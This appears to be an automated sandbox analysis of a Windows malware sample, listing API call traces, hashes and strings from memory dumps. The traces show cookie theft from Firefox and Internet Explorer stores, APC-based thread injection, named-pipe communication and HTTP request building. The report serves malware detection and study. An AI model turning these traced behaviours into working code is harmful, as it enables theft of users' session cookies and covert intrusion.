  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
